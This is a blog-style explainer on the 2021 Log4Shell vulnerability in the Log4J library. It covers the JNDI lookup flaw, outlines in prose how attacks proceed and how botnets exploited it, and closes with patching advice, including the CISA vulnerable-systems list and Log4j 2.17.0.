The Log4J security breach – the whole story!

One of the most dangerous security vulnerability since internet exists

Log4Shell is the name of a vulnerability in the widely used Log4J logging library that existed for years but had never been noticed before. On 24 November 2021, the issue was discovered and reported by the Alibaba Cloud Security Service. An attack was confirmed on 09 December 2021 on the game “Minecraft”.

Log4Shell can execute its own programme code on the target system, which compromises the attacked system. Hackers can leak data from servers or execute arbitrary codes. Internal networks can be spied out or data on the server can be changed.

How does the security gap works?

Log4J is very complex and more than a black box that records processes. Requests from outside are not exclusively written to a log file, but interpreted and this is exactly where the problem is. Using this function, Log4J enables Java programmes to access directory services. Furthermore, JNDI accesses references from remote computers. This is highly dangerours because an attacker using this gap to gain access to the system. JNDI stands for “Java Naming and Directory Interface”.

This means: Log4Shell can access entire system and triggered when Log4J receives a command from outside for the JNDI:

  1. An attacker transmits data to the server he wants to attac
  2. Log4J records the process in a log file
  3. If the data triggers JNDI, Log4j sends a request to the attacker’s website
  4. The attacker gains access
  5. The website responds to the request and injects malicious code
  6. The code is “resting” until it is activated

The dangerous business models behind Log4J breach

Initially, these were mostly manual test attacks and scans by IT security researchers. Following automated attempts to exploit the vulnerability. 

Cybercrime and intelligence services have discovered the gap for their own purposes: so-called “Mirai botnet drones”. This infects vulnerable servers and spreads automatically. The Log4J vulnerability enables initial access to networks. These accesses can be sold to people who use them for their own purposes. 

What to do?

It is very difficult to investigate a system wether is has been breached or not. To determine which programmes use Log4J is not easy. If you are uncertain about a potential breach you should turn the programme off.

CISA’s github repository contains a list of vulnerable systems and applications with a status “vulnerable”, “under investigation”, “not affected” and a link to the corresponding vendor security notifications.

For IT managers, the repository can provide a good overview of whether vulnerable systems are being used in the company.

Manufacturers and developers are also working hard on updates and patches, which should be applied as soon as they are available. 

The JNDI lookup in the latest update to Log4j has thus already been deactivated and version 2.17.0 of the Log4j library has also been added. It closes another high-risk vulnerability (CVE-2021-45105, CVSS 7.5). In any case, administrators and IT managers should not hesitate and install the new Log4J version quickly.